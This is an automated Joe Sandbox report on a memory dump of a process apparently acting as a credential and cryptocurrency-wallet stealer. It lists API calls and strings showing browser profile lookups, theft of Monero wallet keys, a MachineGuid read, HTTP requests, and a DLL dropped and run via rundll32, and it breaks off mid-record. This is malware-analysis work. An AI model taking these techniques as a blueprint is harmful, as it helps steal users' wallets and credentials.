Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

Stable\, xrefs: 0040EB71
firefox, xrefs: 0040EE17
Stable\, xrefs: 0040ED5B

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9

Strings

LzA, xrefs: 00415FC2

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID: LzA
API String ID: 1968765330-1388989900
Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

\Monero\wallet.keys, xrefs: 00401B2F
.keys, xrefs: 00401B0D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3529164666-3586502688
Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
wallet_path, xrefs: 00401A9C

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

.dll, xrefs: 004129ED
C:\Windows\system32\rundll32.exe, xrefs: 00412AE3
"" , xrefs: 00412A32
C:\ProgramData\, xrefs: 00412995

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
